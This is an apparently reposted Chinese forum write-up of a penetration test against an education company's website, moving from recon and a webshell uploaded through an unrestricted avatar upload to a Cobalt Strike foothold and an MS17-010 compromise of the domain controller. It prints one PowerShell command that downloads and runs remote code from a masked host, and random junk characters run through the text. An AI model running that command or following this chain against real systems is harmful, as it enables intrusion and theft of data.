1 c/ R: K" t3 L+ N9 Z
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
: i- E( x ?0 E. M4 g / j! K; M1 P5 W) o3 V
1 v" g: ~" L/ J* t
% h) Q. [% N* j$ }% L+ y3 Z
1 u! v8 H+ `2 y; n" F
) A2 d6 C& `! [. M& k9 G 正文4 h* P2 v2 t2 N, j! l5 q
% k, X2 o% a% t' C( Q8 c
, K" c6 ^* e( e
1 s; t4 w9 ^* k: h2 R ( e5 [% ?8 c& U5 J- h$ ~
7 l6 c& f( f! P
目标:www.xxxx.com(一家教育机构)
3 K& h$ o8 T) x9 ?5 J5 t6 ?打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
; g* ^0 K, T. l: h + Q2 |0 p2 R+ k3 c9 M( ]1 g
. I! ^! k& r( I& R# c! `; v: i
6 \4 P1 Z. T0 J! G9 R( W0 M
( [1 z, r0 n& E, n1 {# ~/ `. y, j
进行了简单的信息搜集 7 K- p3 N0 V8 s) k. `: j
2 Z5 G) [+ I, l+ Y7 X6 |
, u* j9 @/ h( V+ n3 Y3 Q2 Q 6 {- ^6 u! z$ ^3 [) L; r
9 Z7 R; Y, H$ j% p! j1 |
子域名搜集' n; I. o3 V* v' z$ ^
. g7 H; i1 S( S1 }$ C$ {% }3 Q8 L: d7 T5 d1 i1 `9 o& r$ [- v
7 E! ~" d: r) Y8 }3 Z/ k
! ~; V( o9 B& Q; s) u" s
6 e# H1 ?* V3 e- ?( ^% d+ }: v fofa找资产
# S7 e' n. a+ B: P 5 u4 ?4 \+ g: v& u+ J$ K5 N
2 r8 s9 H ~% w
7 |/ m* d3 ~% D
3 U' h0 l& O# @! |4 c0 u # A1 {8 ]. c- D2 D2 n* N
! A+ U2 n5 t( [
# d; G& W% Q h8 [% e! J
一共七个资产。去重之后只有两个。
0 t7 M2 O7 e) e- w2 [/ h4 c 4 }0 F( }8 H k; t
1 U6 z9 g" @3 @" }) J5 F( D( }
1 |7 v F; F( s* O( _' z8 ]. S& }! J
目录探测
" q, j: n! N; I4 u5 J4 h 8 J+ j" G& H8 o4 X' Z& V& L
1 ~1 g" I. _5 |2 E h ~
, T0 W8 i% G- `2 [$ u& H/ z9 \2 x + X/ U, U! p4 R4 j/ `
: ~6 g7 x5 ]4 ^) V. ~- N4 ~
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 4 M2 S/ f1 h& J! b
4 T7 H9 l( r" X; F5 G: P' @9 |! n, R4 u3 {" ?/ Q% a
$ g3 d" m: m. w @( z" n. N6 ]. J
我又尝试了通过修改返回包来绕过登录界面
+ [# {) B* U6 w% c' V5 N/ X 6 c. ^- i; n m! d. k- H s7 i
/ g: ~# z% ?# m/ [* e4 l
/ e' o: a* e7 N. S2 l% s
, b2 w# V* ^+ h* ?- V
* D9 q4 p5 |% B3 h: U+ Y 还是不行,尝试注入无果3 A8 h* b& ]4 Z7 y
" F/ q% e3 F4 U
, L, K7 ~% {8 q; N p' W' q$ s- u1 [! f, k+ F1 W
, z7 V( F9 e8 E; B' @( e) g
: E0 r) r; i* E, Y1 K! j- q
不过我目录探测出了一处Spring信息泄露
0 Y; I& m; K" A) j- q D4 k/ G% w % t$ x6 z s' Z9 o8 O+ G
0 e9 M& Z) r W3 [. A N
4 P; n& E) e/ }, u9 ~
/ }- L/ `% V8 j+ e7 F9 F7 _ [( L
$ r7 X2 I! K5 |0 `1 v
; ]+ M6 F5 n1 z: Q
p; x; A7 I+ ] 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
7 D U. [0 b/ I& J, Z. B5 | 3 [4 t# J' T) s+ C) N9 b; D+ t$ {
7 f/ V8 f: M* K- L' e8 X5 Y! _
% w0 P. k9 i1 S$ F
" t1 u! ~) L9 N: J: b
: M. |7 Z/ l3 a% U 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。1 q- }) \7 K4 H8 Z
' ^+ C4 ^# d( ^& ]& Y
, t/ c# i7 m- T( U G2 J |; r3 |; n
- U3 a8 h% k2 T/ ^" a- Z, l! K( [* I
获取有些师傅到这一步就手机抓包电脑测了。% _% P2 Q) M, X/ ?
( {+ d( C# f% a
: ]0 m: ~9 J$ f) w/ Q2 A0 Q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。1 k1 T* H1 x! U: b
; U/ \6 q5 ]* N( o
6 U4 q/ X; `, G+ u+ W, R: A 其中在一个公众号发现了小程序,可以进行注册。
& k$ ^8 q7 x! w7 p) ?) K" K" { 6 i3 w( }* H1 K% e5 M# C8 a
, s4 a8 `% O- ]# t5 I+ y
看到了头像上传,尝试上传获取WebShell
0 p1 ]3 p1 x1 x0 {
7 S& Z6 p8 U: w- n2 C+ |6 H3 G9 _9 y1 M2 F# ~( T
) q) A! H `5 o! |/ g |& [) q
) R$ n8 f. _2 `8 x) @5 ?9 F7 m+ ]
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问- R! o0 S0 t/ z/ w- K5 r& E9 ^7 `
8 @7 ]# [; E/ K3 K
; z' R4 b6 A% W: H$ E
' D1 K2 [& m+ l - e% u- w( F2 N0 v) {7 F
* I! j+ l x( T4 H; R 然后上了大马3 R, g* i. g2 @4 f9 k4 o
; H8 \0 y' N u1 ?6 c6 Z' f
# h8 s) z. j( m! P n4 F
) P& j4 Z( g9 K& H& N* f$ U
; \* C+ S: f" Q% c. q! I
( S2 I$ Z: m B# t7 s. g1 P , ?# S8 x d4 C
. K1 L* H* i4 O% }2 V1 \9 s/ o" H7 I3 a: f- |. `
通过翻找文件发现数据库账号密码
, m6 c3 q7 z0 R2 e- ]: B. Z1 T& z
; m0 W3 v# l5 N! X( V; q/ |8 V0 T0 ~* v" u0 F+ d7 ]5 ]# X2 W
- k# C0 y K$ X" Z
- q r! o* j. S* J/ ]
2 Y7 S+ H# l( \: F6 @! l4 a' B --内网渗透
$ s: C( {1 P7 l# y: i9 V " j3 t. u* V* U) h6 h2 Y
2 r4 g! N& E9 g2 ?; s8 t$ A
直接通过powershell执行 cs上线9 K* [! c$ L% G) L* ], n
9 }! z# a( H2 E' V9 ^" J" m
' R6 {/ ]6 q6 g powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
2 {7 x' L# J* z
- W; i4 x$ _8 C7 C
" W; [; G. F* D/ T 3 K! F9 Z5 F' b! Z# ?
# C4 ~" _" o- B
8 i2 K) t/ V/ Y/ ]9 l
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 n) |7 l# g, `; d& V- D& V, v
# u2 J- D+ h1 ?4 _
" K1 ]- |5 _+ k, s4 b0 Q/ l ) |4 l8 x% H/ Q& w: v
2 B: |) |; b5 q7 r
- {2 S ^' y. N2 n I 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 1 T" z4 t9 I. P2 D) x8 {; n. A* N
8 v# l* @: G; a) g3 T/ I- d
a' G: R2 T2 }; L( |% ~; |
' h" Y4 S; P* x% @. A8 J
; G6 T. o4 H" O( @4 b! o- c3 a/ R; F
* m" ]$ o3 c8 s2 z. q% }- h/ I+ _
) f7 b6 L ?) _& @. _
- Q) V% M5 \! ~5 g' I, r6 i5 `, x
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 ) j3 I( T6 _) `/ n7 a n
6 b& T0 s# k- P2 P; P2 s& o* }/ M' C' I4 l0 b# u+ l5 L
. z+ w2 L+ r. x0 _$ D! B1 A1 j% Y2 Q* w% n0 ^
, w! t3 r1 E: m) f! `
* I% a( k) Y( e* g7 |. E
( c% ?+ [8 q4 f) m0 a# E
# |6 S) a6 Y7 i8 c& m9 f9 H
) S; J, b% t; n2 o% R1 X. S! ^
7 M% s4 r* V! x* s8 q, F& u ) [/ m8 }" E! n) u
8 M0 v% Y! N% Q3 o5 L
+ m; K! D% b6 o# k5 F: L9 W
: y1 R9 s& X5 v* e' r2 n( s) r. Y! {+ J3 C9 l, G3 G& ~$ V
小结
% Z$ i" T2 |* F % A" J8 S/ [' Q
7 K3 @4 B+ y: u5 Q. ?+ p2 i
2 _( \0 y2 R. S9 I0 ?8 [# R0 r + R5 {+ o1 X( L3 [) }$ d/ S
; W: A4 s) i) }4 I
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
( E _- D# U0 ~1 G- z+ a& }# Z ; z3 M' c. p" ~" L9 x- w" A7 k
4 m6 q* n7 A# s7 U/ L) z+ C6 M
/ h y" c( O7 r3 a% O* y# c5 f / C& h" Z( }0 P6 |( u+ U
+ K1 M6 K; j& H5 @) f7 n
- & H5 M. z. c- x. ?
( e3 D/ e0 w) [- l( t
# B* d: L D0 @0 q% k/ `
- p& o2 I! B0 B$ a; S
0 ]0 \2 o' p- g! Z# a" z$ o
: c( R$ x0 w- p& J k0 q
, a7 F3 a+ r4 j: v! e. {! U6 ~+ N6 o
7 Z2 o1 S( _' ^- e7 r7 L; E; S 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
4 \2 q4 o- m9 Z- {) b! O' ~ . P7 N( C/ d/ K0 O/ _' i
( I+ G+ J; v1 t1 M 3 K8 J3 S( r% l# X
|